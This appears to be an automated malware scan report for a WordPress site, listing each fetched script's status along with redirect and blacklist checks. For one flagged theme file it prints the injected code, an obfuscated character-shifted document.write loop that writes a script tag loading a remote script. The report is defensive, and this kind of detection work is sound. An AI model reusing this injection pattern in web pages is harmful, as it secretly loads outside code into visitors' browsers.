Scanned pages/files
Request | Server response | Status |
http://www.grawerton.biz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 26 Jun 2014 21:38:09 GMT Location: http://grawerton.biz/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://grawerton.biz/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://grawerton.biz/ | 200 OK Content-Length: 27499 Content-Type: text/html | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/more_moo.js | 200 OK Content-Length: 134974 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/loader.js | 200 OK Content-Length: 1439 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/effects.min.js | 200 OK Content-Length: 172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools -->
Antivirus reports:
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/prettyPhoto.js | 200 OK Content-Length: 30486 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery-ui-1.8.4.custom.min.js | 200 OK Content-Length: 27494 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery.form.js | 200 OK Content-Length: 22844 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery.validate.js | 200 OK Content-Length: 36479 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/cufon-yui.js | 200 OK Content-Length: 18263 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/fonts/ | 403 Forbidden Content-Length: 317 Content-Type: text/html | clean |
http://grawerton.biz/test404page.js | 404 Not Found Content-Length: 12890 Content-Type: text/html | clean |
http://grawerton.biz/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72194 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 22597 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.3 | 200 OK Content-Length: 5802 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grawerton.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Jun 2014 21:38:10 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://grawerton.biz/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: grawerton.biz
Referer: http://www.google.com/search?q=grawerton.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grawerton.biz
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://grawerton.biz/
Result: grawerton.biz is not infected or malware details are not published yet.